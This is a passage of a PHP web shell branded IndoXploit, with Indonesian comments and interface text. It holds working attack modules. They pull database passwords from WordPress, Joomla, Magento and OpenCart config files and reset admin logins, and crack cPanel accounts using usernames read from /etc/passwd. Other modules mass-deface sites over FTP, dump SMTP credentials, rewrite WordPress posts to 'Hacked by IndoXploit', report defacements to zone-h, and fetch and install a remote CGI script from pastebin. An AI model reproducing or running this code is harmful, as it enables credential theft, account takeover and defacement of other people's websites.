783.                     $site = ambilkata($config,"sitename = '","'");
784.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
785.                     echo "Config => ".$file_conf."<br>";
786.                     echo "CMS => Joomla<br>";
787.                     if($site == '') {
788.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
789.                     } else {
790.                         echo "Sitename => $site<br>";
791.                     }
792.                     if(!$update OR !$conn OR !$db) {
793.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
794.                     } else {
795.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
796.                     }
797.                     mysql_close($conn);
798.                 } elseif(preg_match("/WordPress/",$config)) {
799.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
800.                     $dbuser = ambilkata($config,"DB_USER', '","'");
801.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
802.                     $dbname = ambilkata($config,"DB_NAME', '","'");
803.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
804.                     $prefix = $dbprefix."users";
805.                     $option = $dbprefix."options";
806.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
807.                     $db = mysql_select_db($dbname);
808.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
809.                     $result = mysql_fetch_array($q);
810.                     $id = $result[ID];
811.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
812.                     $result2 = mysql_fetch_array($q2);
813.                     $target = $result2[option_value];
814.                     if($target == '') {
815.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
816.                     } else {
817.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
818.                     }
819.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
820.                     echo "Config => ".$file_conf."<br>";
821.                     echo "CMS => Wordpress<br>";
822.                     echo $url_target;
823.                     if(!$update OR !$conn OR !$db) {
824.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
825.                     } else {
826.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
827.                     }
828.                     mysql_close($conn);
829.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
830.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
831.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
832.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
833.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
834.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
835.                     $prefix = $dbprefix."admin_user";
836.                     $option = $dbprefix."core_config_data";
837.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
838.                     $db = mysql_select_db($dbname);
839.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
840.                     $result = mysql_fetch_array($q);
841.                     $id = $result[user_id];
842.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
843.                     $result2 = mysql_fetch_array($q2);
844.                     $target = $result2[value];
845.                     if($target == '') {
846.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
847.                     } else {
848.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
849.                     }
850.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
851.                     echo "Config => ".$file_conf."<br>";
852.                     echo "CMS => Magento<br>";
853.                     echo $url_target;
854.                     if(!$update OR !$conn OR !$db) {
855.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
856.                     } else {
857.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
858.                     }
859.                     mysql_close($conn);
860.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
861.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
862.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
863.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
864.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
865.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
866.                     $prefix = $dbprefix."user";
867.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
868.                     $db = mysql_select_db($dbname);
869.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
870.                     $result = mysql_fetch_array($q);
871.                     $id = $result[user_id];
872.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
873.                     if($target == '') {
874.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
875.                     } else {
876.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
877.                     }
878.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
879.                     echo "Config => ".$file_conf."<br>";
880.                     echo "CMS => OpenCart<br>";
881.                     echo $url_target;
882.                     if(!$update OR !$conn OR !$db) {
883.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
884.                     } else {
885.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
886.                     }
887.                     mysql_close($conn);
888.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
889.                     $dbhost = ambilkata($config,'server = "','"');
890.                     $dbuser = ambilkata($config,'username = "','"');
891.                     $dbpass = ambilkata($config,'password = "','"');
892.                     $dbname = ambilkata($config,'database = "','"');
893.                     $prefix = "users";
894.                     $option = "identitas";
895.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
896.                     $db = mysql_select_db($dbname);
897.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
898.                     $result = mysql_fetch_array($q);
899.                     $target = $result[alamat_website];
900.                     if($target == '') {
901.                         $target2 = $result[url];
902.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
903.                         if($target2 == '') {
904.                             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
905.                         } else {
906.                             $cek_login3 = file_get_contents("$target2/adminweb/");
907.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
908.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
909.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
910.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
911.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
912.                             } else {
913.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
914.                             }
915.                         }
916.                     } else {
917.                         $cek_login = file_get_contents("$target/adminweb/");
918.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
919.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
920.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
921.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
922.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
923.                         } else {
924.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
925.                         }
926.                     }
927.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
928.                     echo "Config => ".$file_conf."<br>";
929.                     echo "CMS => Lokomedia<br>";
930.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
931.                         echo $url_target2;
932.                     } else {
933.                         echo $url_target;
934.                     }
935.                     if(!$update OR !$conn OR !$db) {
936.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
937.                     } else {
938.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
939.                     }
940.                     mysql_close($conn);
941.                 }
942.             }
943.         }
944.     } else {
945.         echo "<center>
946.        <h1>Auto Edit User Config</h1>
947.        <form method='post'>
948.        DIR Config: <br>
949.        <input type='text' size='50' name='config_dir' value='$dir'><br><br>
950.        Set User & Pass: <br>
951.        <input type='text' name='user_baru' value='indoxploit' placeholder='user_baru'><br>
952.        <input type='text' name='pass_baru' value='indoxploit' placeholder='pass_baru'><br>
953.        <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
954.        </form>
955.        <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
956.        ";
957.     }
958. } elseif($_GET['do'] == 'cpanel') {
959.     if($_POST['crack']) {
960.         $usercp = explode("\r\n", $_POST['user_cp']);
961.         $passcp = explode("\r\n", $_POST['pass_cp']);
962.         $i = 0;
963.         foreach($usercp as $ucp) {
964.             foreach($passcp as $pcp) {
965.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
966.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
967.                     } else {
968.                         $_SESSION[$ucp] = "1";
969.                         $_SESSION[$pcp] = "1";
970.                         if($ucp == '' || $pcp == '') {
971.                            
972.                         } else {
973.                             $i++;
974.                             if(function_exists('posix_getpwuid')) {
975.                                 $domain_cp = file_get_contents("/etc/named.conf");
976.                                 if($domain_cp == '') {
977.                                     $dom =  "<font color=red>gabisa ambil nama domain nya</font>";
978.                                 } else {
979.                                     preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
980.                                     foreach($domains_cp[1] as $dj) {
981.                                         $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
982.                                         $user_cp_url = $user_cp_url['name'];
983.                                         if($user_cp_url == $ucp) {
984.                                             $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
985.                                             break;
986.                                         }
987.                                     }
988.                                 }
989.                             } else {
990.                                 $dom = "<font color=red>function is Disable by system</font>";
991.                             }
992.                             echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
993.                         }
994.                     }
995.                 }
996.             }
997.         }
998.         if($i == 0) {
999.         } else {
1000.             echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>IndoXploit.</font>";
1001.         }
1002.     } else {
1003.         echo "<center>
1004.        <form method='post'>
1005.        USER: <br>
1006.        <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1007.         $_usercp = fopen("/etc/passwd","r");
1008.         while($getu = fgets($_usercp)) {
1009.             if($getu == '' || !$_usercp) {
1010.                 echo "<font color=red>Can't read /etc/passwd</font>";
1011.             } else {
1012.                 preg_match_all("/(.*?):x:/", $getu, $u);
1013.                 foreach($u[1] as $user_cp) {
1014.                         if(is_dir("/home/$user_cp/public_html")) {
1015.                             echo "$user_cp\n";
1016.                     }
1017.                 }
1018.             }
1019.         }
1020.         echo "</textarea><br>
1021.        PASS: <br>
1022.        <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1023.         function cp_pass($dir) {
1024.             $pass = "";
1025.             $dira = scandir($dir);
1026.             foreach($dira as $dirb) {
1027.                 if(!is_file("$dir/$dirb")) continue;
1028.                 $ambil = file_get_contents("$dir/$dirb");
1029.                 if(preg_match("/WordPress/", $ambil)) {
1030.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1031.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1032.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
1033.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1034.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1035.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1036.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
1037.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1038.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1039.                 } elseif(preg_match("/^[client]$/", $ambil)) {
1040.                     preg_match("/password=(.*?)/", $ambil, $pass1);
1041.                     if(preg_match('/"/', $pass1[1])) {
1042.                         $pass1[1] = str_replace('"', "", $pass1[1]);
1043.                         $pass .= $pass1[1]."\n";
1044.                     } else {
1045.                         $pass .= $pass1[1]."\n";
1046.                     }
1047.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1048.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1049.                 }
1050.             }
1051.             echo $pass;
1052.         }
1053.         $cp_pass = cp_pass($dir);
1054.         echo $cp_pass;
1055.         echo "</textarea><br>
1056.        <input type='submit' name='crack' style='width: 450px;' value='Crack'>
1057.        </form>
1058.        <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1059.     }
1060. } elseif($_GET['do'] == 'cpftp_auto') {
1061.     if($_POST['crack']) {
1062.         $usercp = explode("\r\n", $_POST['user_cp']);
1063.         $passcp = explode("\r\n", $_POST['pass_cp']);
1064.         $i = 0;
1065.         foreach($usercp as $ucp) {
1066.             foreach($passcp as $pcp) {
1067.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
1068.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1069.                     } else {
1070.                         $_SESSION[$ucp] = "1";
1071.                         $_SESSION[$pcp] = "1";
1072.                         if($ucp == '' || $pcp == '') {
1073.                             //
1074.                         } else {
1075.                             echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
1076.                             $ftp_conn = ftp_connect($ip);
1077.                             $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
1078.                             if((!$ftp_login) || (!$ftp_conn)) {
1079.                                 echo "[+] <font color=red>Login Gagal</font><br><br>";
1080.                             } else {
1081.                                 echo "[+] <font color=lime>Login Sukses</font><br>";
1082.                                 $fi = htmlspecialchars($_POST['file_deface']);
1083.                                 $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
1084.                                 if($deface) {
1085.                                     $i++;
1086.                                     echo "[+] <font color=lime>Deface Sukses</font><br>";
1087.                                     if(function_exists('posix_getpwuid')) {
1088.                                         $domain_cp = file_get_contents("/etc/named.conf");
1089.                                         if($domain_cp == '') {
1090.                                             echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1091.                                         } else {
1092.                                             preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1093.                                             foreach($domains_cp[1] as $dj) {
1094.                                                 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1095.                                                 $user_cp_url = $user_cp_url['name'];
1096.                                                 if($user_cp_url == $ucp) {
1097.                                                     echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
1098.                                                     break;
1099.                                                 }
1100.                                             }
1101.                                         }
1102.                                     } else {
1103.                                         echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1104.                                     }
1105.                                 } else {
1106.                                     echo "[-] <font color=red>Deface Gagal</font><br><br>";
1107.                                 }
1108.                             }
1109.                             //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
1110.                         }
1111.                     }
1112.                 }
1113.             }
1114.         }
1115.         if($i == 0) {
1116.         } else {
1117.             echo "<br>sukses deface ".$i." Cpanel by <font color=lime>IndoXploit.</font>";
1118.         }
1119.     } else {
1120.         echo "<center>
1121.        <form method='post'>
1122.        Filename: <br>
1123.        <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
1124.        Deface Page: <br>
1125.        <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
1126.        USER: <br>
1127.        <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1128.         $_usercp = fopen("/etc/passwd","r");
1129.         while($getu = fgets($_usercp)) {
1130.             if($getu == '' || !$_usercp) {
1131.                 echo "<font color=red>Can't read /etc/passwd</font>";
1132.             } else {
1133.                 preg_match_all("/(.*?):x:/", $getu, $u);
1134.                 foreach($u[1] as $user_cp) {
1135.                         if(is_dir("/home/$user_cp/public_html")) {
1136.                             echo "$user_cp\n";
1137.                     }
1138.                 }
1139.             }
1140.         }
1141.         echo "</textarea><br>
1142.        PASS: <br>
1143.        <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1144.         function cp_pass($dir) {
1145.             $pass = "";
1146.             $dira = scandir($dir);
1147.             foreach($dira as $dirb) {
1148.                 if(!is_file("$dir/$dirb")) continue;
1149.                 $ambil = file_get_contents("$dir/$dirb");
1150.                 if(preg_match("/WordPress/", $ambil)) {
1151.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1152.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1153.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
1154.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1155.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1156.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1157.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
1158.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1159.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1160.                 } elseif(preg_match("/client/", $ambil)) {
1161.                     preg_match("/password=(.*)/", $ambil, $pass1);
1162.                     if(preg_match('/"/', $pass1[1])) {
1163.                         $pass1[1] = str_replace('"', "", $pass1[1]);
1164.                         $pass .= $pass1[1]."\n";
1165.                     }
1166.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1167.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1168.                 }
1169.             }
1170.             echo $pass;
1171.         }
1172.         $cp_pass = cp_pass($dir);
1173.         echo $cp_pass;
1174.         echo "</textarea><br>
1175.        <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
1176.        </form>
1177.        <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1178.     }
1179. } elseif($_GET['do'] == 'smtp') {
1180.     echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
1181.     function scj($dir) {
1182.         $dira = scandir($dir);
1183.         foreach($dira as $dirb) {
1184.             if(!is_file("$dir/$dirb")) continue;
1185.             $ambil = file_get_contents("$dir/$dirb");
1186.             $ambil = str_replace("$", "", $ambil);
1187.             if(preg_match("/JConfig|joomla/", $ambil)) {
1188.                 $smtp_host = ambilkata($ambil,"smtphost = '","'");
1189.                 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
1190.                 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
1191.                 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
1192.                 $smtp_port = ambilkata($ambil,"smtpport = '","'");
1193.                 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
1194.                 echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
1195.                 echo "SMTP port: <font color=lime>$smtp_port</font><br>";
1196.                 echo "SMTP user: <font color=lime>$smtp_user</font><br>";
1197.                 echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
1198.                 echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
1199.                 echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
1200.             }
1201.         }
1202.     }
1203.     $smpt_hunter = scj($dir);
1204.     echo $smpt_hunter;
1205. } elseif($_GET['do'] == 'auto_wp') {
1206.     if($_POST['hajar']) {
1207.         $title = htmlspecialchars($_POST['new_title']);
1208.         $pn_title = str_replace(" ", "-", $title);
1209.         if($_POST['cek_edit'] == "Y") {
1210.             $script = $_POST['edit_content'];
1211.         } else {
1212.             $script = $title;
1213.         }
1214.         $conf = $_POST['config_dir'];
1215.         $scan_conf = scandir($conf);
1216.         foreach($scan_conf as $file_conf) {
1217.             if(!is_file("$conf/$file_conf")) continue;
1218.             $config = file_get_contents("$conf/$file_conf");
1219.             if(preg_match("/WordPress/", $config)) {
1220.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
1221.                 $dbuser = ambilkata($config,"DB_USER', '","'");
1222.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1223.                 $dbname = ambilkata($config,"DB_NAME', '","'");
1224.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
1225.                 $prefix = $dbprefix."posts";
1226.                 $option = $dbprefix."options";
1227.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1228.                 $db = mysql_select_db($dbname);
1229.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
1230.                 $result = mysql_fetch_array($q);
1231.                 $id = $result[ID];
1232.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1233.                 $result2 = mysql_fetch_array($q2);
1234.                 $target = $result2[option_value];
1235.                 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
1236.                 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
1237.                 echo "<div style='margin: 5px auto;'>";
1238.                 if($target == '') {
1239.                     echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
1240.                 } else {
1241.                     echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
1242.                 }
1243.                 if(!$update OR !$conn OR !$db) {
1244.                     echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
1245.                 } else {
1246.                     echo "<font color=lime>sukses di ganti.</font><br>";
1247.                 }
1248.                 echo "</div>";
1249.                 mysql_close($conn);
1250.             }
1251.         }
1252.     } else {
1253.         echo "<center>
1254.        <h1>Auto Edit Title+Content WordPress</h1>
1255.        <form method='post'>
1256.        DIR Config: <br>
1257.        <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1258.        Set Title: <br>
1259.        <input type='text' name='new_title' value='Hacked by IndoXploit' placeholder='New Title'><br><br>
1260.        Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
1261.        <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
1262.        <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
1263.        <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
1264.        </form>
1265.        <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1266.        ";
1267.     }
1268. } elseif($_GET['do'] == 'zoneh') {
1269.     if($_POST['submit']) {
1270.         $domain = explode("\r\n", $_POST['url']);
1271.         $nick =  $_POST['nick'];
1272.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
1273.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
1274.         function zoneh($url,$nick) {
1275.             $ch = curl_init("http://www.zone-h.com/notify/single");
1276.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1277.                   curl_setopt($ch, CURLOPT_POST, true);
1278.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
1279.             return curl_exec($ch);
1280.                   curl_close($ch);
1281.         }
1282.         foreach($domain as $url) {
1283.             $zoneh = zoneh($url,$nick);
1284.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
1285.                 echo "$url -> <font color=lime>OK</font><br>";
1286.             } else {
1287.                 echo "$url -> <font color=red>ERROR</font><br>";
1288.             }
1289.         }
1290.     } else {
1291.         echo "<center><form method='post'>
1292.        <u>Defacer</u>: <br>
1293.        <input type='text' name='nick' size='50' value='IndoXploit'><br>
1294.        <u>Domains</u>: <br>
1295.        <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
1296.        <input type='submit' name='submit' value='Submit' style='width: 450px;'>
1297.        </form>";
1298.     }
1299.     echo "</center>";
1300. } elseif($_GET['do'] == 'cgi') {
1301.     $cgi_dir = mkdir('idx_cgi', 0755);
1302.     $file_cgi = "idx_cgi/cgi.izo";
1303.     $isi_htcgi = "AddHandler cgi-script .izo";
1304.     $htcgi = fopen(".htaccess", "w");
1305.     $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
1306.     $cgi = fopen($file_cgi, "w");
1307.     fwrite($cgi, $cgi_script);
1308.     fwrite($htcgi, $isi_htcgi);
1309.     chmod($file_cgi, 0755);
1310.     echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
1311. } elseif($_GET['do'] == 'fake_root') {
1312.     ob_start();
1313.     $cwd = getcwd();
1314.     $ambil_user = explode("/", $cwd);
1315.     $user = $ambil_user[2];
1316.     if($_POST['reverse']) {
1317.         $site = explode("\r\n", $_POST['url']);
1318.         $file = $_POST['file'];
1319.         foreach($site as $url) {
1320.             $cek = getsource("$url/~$user/$file");
1321.             if(preg_match("/hacked/i", $cek)) {
1322.                 echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
1323.             }
1324.         }
1325.     } else {
1326.         echo "<center><form method='post'>
1327.        Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
1328.        User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
1329.        Domain: <br>
1330.        <textarea style='width: 450px; height: 250px;' name='url'>";
1331.         reverse($_SERVER['HTTP_HOST']);
1332.         echo "</textarea><br>
1333.        <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
1334.        </form><br>
1335.        NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
1336.     }
1337. } elseif($_GET['do'] == 'adminer') {
1338.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
1339.     function adminer($url, $isi) {
1340.         $fp = fopen($isi, "w");
1341.         $ch = curl_init();
1342.               curl_setopt($ch, CURLOPT_URL, $url);
1343.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
1344.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1345.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
1346.               curl_setopt($ch, CURLOPT_FILE, $fp);
1347.         return curl_exec($ch);
1348.               curl_close($ch);
1349.         fclose($fp);
1350.         ob_flush();
1351.         flush();
1352.     }
1353.     if(file_exists('adminer.php')) {
1354.         echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1355.     } else {
1356.         if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
1357.             echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1358.         } else {
1359.             echo "<center><font color=red>gagal buat file adminer</font></center>";
1360.         }
1361.     }
1362. } elseif($_GET['do'] == 'auto_dwp') {
1363.     if($_POST['auto_deface_wp']) {
1364.         function anucurl($sites) {
1365.             $ch = curl_init($sites);
1366.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1367.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1368.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1369.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1370.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1371.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1372.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1373.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1374.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1375.             $data = curl_exec($ch);
1376.                   curl_close($ch);
1377.             return $data;
1378.         }
1379.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1380.             $post = array(
1381.                    "log" => "$userr",
1382.                    "pwd" => "$pass",
1383.                    "rememberme" => "forever",
1384.                    "wp-submit" => "$wp_submit",
1385.                    "redirect_to" => "$web",
1386.                    "testcookie" => "1",
1387.                    );
1388.             $ch = curl_init($cek);
1389.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1390.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1391.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1392.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1393.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1394.                   curl_setopt($ch, CURLOPT_POST, 1);
